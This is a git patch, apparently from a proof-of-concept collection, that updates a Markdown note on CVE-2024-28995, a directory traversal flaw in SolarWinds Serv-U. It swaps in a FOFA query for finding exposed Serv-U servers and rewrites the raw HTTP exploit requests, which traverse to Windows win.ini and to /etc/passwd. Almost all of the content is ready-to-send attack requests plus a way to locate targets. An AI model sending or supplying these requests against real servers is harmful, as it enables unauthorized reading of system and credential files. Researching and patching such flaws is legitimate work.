From 4fe572e1a528e2647c9e01ae357eccf5c168c09c Mon Sep 17 00:00:00 2001
From: wy876
Date: Sat, 15 Jun 2024 00:33:31 +0800
Subject: [PATCH] =?UTF-8?q?=E4=BF=AE=E6=94=B9=E6=95=B0=E6=8D=AE=E5=8C=85?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 ...Winds-Serv-U目录遍历漏洞(CVE-2024-28995).md | 18 +++++++++++++++---
 1 file changed, 15 insertions(+), 3 deletions(-)

diff --git a/SolarWinds-Serv-U目录遍历漏洞(CVE-2024-28995).md b/SolarWinds-Serv-U目录遍历漏洞(CVE-2024-28995).md
index 8f1760e..eb2288d 100644
--- a/SolarWinds-Serv-U目录遍历漏洞(CVE-2024-28995).md
+++ b/SolarWinds-Serv-U目录遍历漏洞(CVE-2024-28995).md
@@ -7,14 +7,26 @@ CVE-2024-28995 SolarWinds Serv-U FTP目录遍历文件读取漏洞,攻击者
 ## fofa
 
 ```
-app="SolarWinds-Serv-U-FTP"
+server="Serv-U"
 ```
 
 ## poc
 
 ```
-GET /?InternalDir=/../../../../Windows/&InternalFile=win.ini HTTP/1.1
-Host: 
+GET /?InternalDir=/../../../../windows&InternalFile=win.ini HTTP/1.1
+Host: xx.xxx.xxx.xxx
+User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
+Accept: */*
+Connection: Keep-Alive
+```
+
+```
+GET /?InternalDir=\..\..\..\..\etc&InternalFile=passwd HTTP/1.1
+Host: xxx.xxx.xxx.xxx
+User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: keep-alive
 ```
 
 ![image-20240614211748043](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406142117114.png)
\ No newline at end of file